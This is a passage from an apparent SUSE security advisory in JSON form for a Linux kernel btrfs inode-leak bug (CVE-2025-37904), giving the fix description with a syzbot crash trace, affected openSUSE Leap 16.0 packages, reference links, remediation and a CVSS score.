"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix the inode leak in btrfs_iget()\n\n[BUG]\nThere is a bug report that a syzbot reproducer can lead to the following\nbusy inode at unmount time:\n\n BTRFS info (device loop1): last unmount of filesystem 1680000e-3c1e-4c46-84b6-56bd3909af50\n VFS: Busy inodes after unmount of loop1 (btrfs)\n ------------[ cut here ]------------\n kernel BUG at fs/super.c:650!\n Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n CPU: 0 UID: 0 PID: 48168 Comm: syz-executor Not tainted 6.15.0-rc2-00471-g119009db2674 #2 PREEMPT(full)\n Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n RIP: 0010:generic_shutdown_super+0x2e9/0x390 fs/super.c:650\n Call Trace:\n \u003cTASK\u003e\n kill_anon_super+0x3a/0x60 fs/super.c:1237\n btrfs_kill_super+0x3b/0x50 fs/btrfs/super.c:2099\n deactivate_locked_super+0xbe/0x1a0 fs/super.c:473\n deactivate_super fs/super.c:506 [inline]\n deactivate_super+0xe2/0x100 fs/super.c:502\n cleanup_mnt+0x21f/0x440 fs/namespace.c:1435\n task_work_run+0x14d/0x240 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop kernel/entry/common.c:114 [inline]\n exit_to_user_mode_prepare include/linux/entry-common.h:329 [inline]\n __syscall_exit_to_user_mode_work kernel/entry/common.c:207 [inline]\n syscall_exit_to_user_mode+0x269/0x290 kernel/entry/common.c:218\n do_syscall_64+0xd4/0x250 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n \u003c/TASK\u003e\n\n[CAUSE]\nWhen btrfs_alloc_path() failed, btrfs_iget() directly returned without\nreleasing the inode already allocated by btrfs_iget_locked().\n\nThis results the above busy inode and trigger the kernel BUG.\n\n[FIX]\nFix it by calling iget_failed() if btrfs_alloc_path() failed.\n\nIf we hit error inside btrfs_read_locked_inode(), it will properly call\niget_failed(), so nothing to worry about.\n\nAlthough the iget_failed() cleanup inside btrfs_read_locked_inode() is a\nbreak of the normal error handling scheme, let\u0027s fix the obvious bug\nand backport first, then rework the error handling later.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37904",
"url": "https://www.suse.com/security/cve/CVE-2025-37904"
},
{
"category": "external",
"summary": "SUSE Bug 1243452 for CVE-2025-37904",
"url": "https://bugzilla.suse.com/1243452"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
